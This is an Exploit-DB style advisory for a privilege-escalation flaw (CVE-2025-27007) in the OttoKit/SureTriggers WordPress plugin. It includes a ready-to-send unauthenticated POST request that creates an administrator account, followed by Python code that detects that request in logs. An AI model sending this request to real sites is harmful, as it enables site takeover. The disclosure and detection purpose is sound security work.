Vendor: OttoKit Plugin
By: Abdualhadi Khalifa
CVSS: 6.1 (HIGH)
Category: Privilege Escalation
CWE: 269
Product Name: OttoKit Plugin
Affected Version From: All versions of OttoKit (SureTriggers) ≤ 1.0.82
Affected Version To: 1.0.82
Patch Exists: NO
Related CVE: CVE-2025-27007
CPE: a:suretriggers:ottokit:1.0.82
Metasploit:
Other Scripts:
Platforms Tested: WordPress
Year: 2025

SureTriggers OttoKit Plugin 1.0.82 – Privilege Escalation

SureTriggers OttoKit Plugin version 1.0.82 and below is vulnerable to privilege escalation. An unauthenticated attacker can create an administrator account on the target WordPress site when the plugin is installed but not yet initialized (no API key or secret key configured) and the site exposes the REST API endpoint '/wp-json/sure-triggers/v1/automation/action'. A single crafted HTTP POST request to that endpoint is enough to trigger the account creation.

Mitigation:

Ensure that the OttoKit plugin is fully configured with the required keys and settings as soon as it is activated, so that the automation endpoint never runs without a secret key. Keep the plugin updated to the latest version to pick up fixes for known vulnerabilities.

Exploit-DB raw data:

# Exploit Title: SureTriggers OttoKit Plugin 1.0.82 - Privilege Escalation
# Date: 2025-05-07
# Exploit Author: Abdualhadi Khalifa (https://x.com/absholi7ly/)

# Affected: All versions of OttoKit (SureTriggers) ≤ 1.0.82

Conditions for Exploitation
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#conditions-for-exploitation>

The vulnerability can be exploited under the following circumstances:

   1. OttoKit must be installed and activated on the target WordPress site.
   2. The plugin is *uninitialized* (e.g., no API key or "secret_key" is set in the database).
   3. The target site exposes the REST API endpoint '/wp-json/sure-triggers/v1/automation/action'.

------------------------------
HTTP Request
<https://github.com/absholi7ly/CVE-2025-27007-OttoKit-exploit/#http-request>
The following request targets the /wp-json/sure-triggers/v1/automation/action endpoint to create an administrator account:

POST /wp-json/sure-triggers/v1/automation/action HTTP/1.1
Host: [target-site]
Content-Type: application/x-www-form-urlencoded
St-Authorization:
Content-Length: [length]

selected_options[user_name]=new_admin&selected_options[user_email]=attacker@example.com&selected_options[password]=StrongP@ssw0rd123&selected_options[role]=administrator&aintegration=WordPress&type_event=create_user_if_not_exists
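As an added defender-side example (not part of the advisory or of the plugin's code), the following Python flags captured requests that match the pattern above: a POST to the automation endpoint with an empty or missing St-Authorization header and a create_user_if_not_exists event asking for the administrator role. The sample requests are constructed; the host name and the token value are placeholders.

```python
from urllib.parse import parse_qs

ENDPOINT = "/wp-json/sure-triggers/v1/automation/action"

def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, path, headers, body);
    header names are lower-cased for case-insensitive lookup."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def is_ottokit_privesc(raw: str) -> bool:
    """True when the request matches the uninitialized-plugin abuse pattern."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path.split("?", 1)[0] != ENDPOINT:
        return False
    # With no secret key configured the exploit sends the header empty (or
    # omits it); a request carrying a token is ordinary plugin traffic.
    if headers.get("st-authorization", ""):
        return False
    params = parse_qs(body)
    event = params.get("type_event", [""])[0]
    role = params.get("selected_options[role]", [""])[0].lower()
    return event == "create_user_if_not_exists" and role == "administrator"

def flagged_requests(requests):
    """Indices of the captured requests that should raise an alert."""
    return [i for i, raw in enumerate(requests) if is_ottokit_privesc(raw)]

# Constructed samples: 0 mirrors the advisory's request, 1 is the same action
# with a placeholder token set, 2 is unrelated REST traffic.
BODY = ("selected_options[user_name]=new_admin"
        "&selected_options[user_email]=attacker@example.com"
        "&selected_options[password]=StrongP%40ssw0rd123"
        "&selected_options[role]=administrator"
        "&integration=WordPress&type_event=create_user_if_not_exists")
SAMPLE_REQUESTS = [
    "\r\n".join(["POST " + ENDPOINT + " HTTP/1.1", "Host: example.test",
                 "St-Authorization:", "", BODY]),
    "\r\n".join(["POST " + ENDPOINT + " HTTP/1.1", "Host: example.test",
                 "St-Authorization: PLACEHOLDER_TOKEN", "", BODY]),
    "\r\n".join(["GET /wp-json/wp/v2/posts HTTP/1.1", "Host: example.test", "", ""]),
]
```

Feed it requests as logged by a reverse proxy or WAF that records headers and bodies; a plain access log lacks the header and so cannot distinguish the exploit from legitimate plugin traffic.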